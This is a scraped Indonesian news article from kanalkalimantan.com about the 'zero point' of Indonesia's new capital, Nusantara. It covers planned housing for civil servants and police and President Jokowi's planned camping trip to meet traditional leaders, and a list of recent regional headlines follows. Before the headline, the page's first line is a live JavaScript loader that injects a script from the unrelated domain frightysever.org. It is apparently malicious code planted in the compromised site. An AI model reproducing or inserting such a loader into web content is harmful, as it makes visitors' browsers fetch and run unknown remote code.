(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Mengenal Titik Nol Ibu Kota Baru, Recana Tempat Presiden Jokowi Camping


KANALKALIMANTAN.COM – Penasaran dengan titik nol ibu kota baru? Menteri Perencanaan Pembangunan Nasional (PPN) atau Kepala Bappenas Suharso Monoarfa menjelaskan apa yang dimaksud dengan titik nol dalam pembangunan Istana Negara di Ibu Kota Negara (IKN) baru Nusantara di Kalimantan. Titik nol Ibu Kota Negara Baru Nusantara adalah titik referensi untuk menghitung tingkat ketinggian bangunan di atas permukaan air laut.

Nantinya, Istana Negara di IKN Nusantara akan dibangun di daerah yang sedikit lebih tinggi dengan sayap sebelah kanan dibangun gedung DPR dan MPR, bagian yudikatif berada di sayap sebelah kiri. Kabarnya, pembangunan IKN akan dilakukan secara bertahap sampai dengan tahun 2045 mendatang.

Perlu digaris bawahi, bahwa Istana Negara di ibu kota baru, tidak dibangun di titik nol. Karena titik nol ibu kota baru Nusantara hanya sebagai titik referensi untuk menghitung tingkat ketinggian bangunan di atas permukaan air laut.

Pemerintah akan menyiapkan hunian untuk aparatur sipil negara (ASN) dan juga anggota TNI-Polri di kawasan Ibu Kota Negara (IKN) baru di Kalimantan Timur. Untuk tahap awal, ada sebanyak 2.500 hunian yan akan dibangun untuk para ASN dan TNI-Polri.

 

 

Baca juga: Antisipasi Lonjakan Covid-19, Banjarbaru Kembali Ambil Kebijakan PTM Terbatas 50 Persen

Berdasarkan data sementara dari Badan Perencanaan Pembangunan Nasional (Bappenas), rencana jumlah ASN dan anggota TNI-Polri yang akan dipindahkan ke IKN pada tahap awal sebanyak 7.687 orang. Dengan rincian, sebanyak 1.971 ASN dan 5.716 TNI/Polri termasuk pasukan pengamanan presiden (Paspampres), Badan Intelijen Negara (BIN), dan jajarannya.

 

Kemah di Titik Nol Ibu Kota Baru

 

Kabar terbaru, Presiden Joko Widodo alias Jokowi juga akan camping di titik nol ibu kota baru. Hal ini diungkap kan oleh Gubernur Kalimantan Timur, Isran Noor yang mengatakan kalau rencana camping Presiden Jokowi merupakan bukti serius pemindahan ibu kota.

Isran mengaku jika dirinya mendapatkan informasi tersebut langsung dari Presiden Jokowi dalam rapat singkat di VIP Bandara Sultan Aji Muhammad Sulaiman Sepinggan usai pengukuhan PBNU di Balikpapan Sport Center and Convention Dome Balikpapan. Rapat tersebut hanya dihadiri oleh Presiden Jokowi, dirinya, dan Menteri Sekretaris Negara Pratikno. Informasi ini seperti dilansir dari laman CNBCIndonesia.

Kegiatan camping di titik nol ibu kota baru akan dimanfaatkan oleh Presiden Jokowi untuk bertemu para tokoh adat di Kaltim. Mulai tokoh adat Kutai, Dayak, Paser, Berau, Banjar, Bugis, hingga Jawa.

Saat itu juga akan ditampilkan karya seni budaya dari berbagai suku di Kalimantan Timur. Selain itu, juga akan dilakukan doa bersama demi kelancaran pemindahan IKN Nusantara dari Jakarta ke Sepaku.

Baca juga: Pedagang Jual Minyak Goreng di Atas HET, Diskoperindag HSU Siap Beri Sanksi

Proses penyelenggaraan acara, kata Isran akan dibiayai oleh Sekretariat Negara, sementara pengaturan lokasinya akan ditentukan oleh Kementerian PUPR, TNI, dan juga Polri.

Itulah ulasan agar mengenal lebih jauh mengenai titik nol ibu kota baru yang dijadikan tempat berkemah Presiden Jokowi. (kanalkalimantan.com/suara.com/rishna maulina pratama)

Editor : kk


Risa

Recent Posts

Ini Penyebab Utama Crossing Drainase di Karang Anyar 1 Sering Berlubang

KANALKALIMANTAN.COM, BANJARBARU - Penyebab jalan berlubang yang kerap muncul di Jalan Karang Anyar 1 Kelurahan… Read More

15 menit ago

Kicau Mania Ramaikan Kapolresta Banjarmasin Cup 2024

KANALKALIMANTAN.COM, BANJARMASIN - Kepolisian Resor (Polres) Kota Banjarmasin menggelar lomba Burung Berkicau, Minggu (19/5/2024) siang,… Read More

13 jam ago

Pastikan Listrik Tanpa Kedip KTT WWF 2024 Bali

KANALKALIMANTAN.COM, DENPASAR - PT PLN (Persero) siap menghadirkan listrik yang andal untuk mendukung penyelenggaraan Konferensi… Read More

14 jam ago

Santri TK Al Quran di Kabupaten Banjar Ikuti Munaqasah

KANALKALIMANTAN.COM, MARTAPURA -  Santri TK Al Quran se-Kabupaten Banjar mengikuti Munaqasah yang digelar Badan Komunikasi… Read More

15 jam ago

Jelang Pilwali Banjarbaru, Nurkhalis: Masih Lihat Peta Peluang Koalisi

KANALKALIMANTAN.COM, BANJARBARU - Peta koalisi partai politik jelang Pilkada 2024 di Kota Banjarbaru Kalimantan Selatan… Read More

16 jam ago

Daftar Bareng Aditya-Yuti, Koalisi “AYUHA” PPP-Gerindra di Pilwali Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Teka-teki maju atau tidaknya Aditya Mufti Ariffin mulai terjawab, bahkan siapa calon… Read More

18 jam ago

This website uses cookies.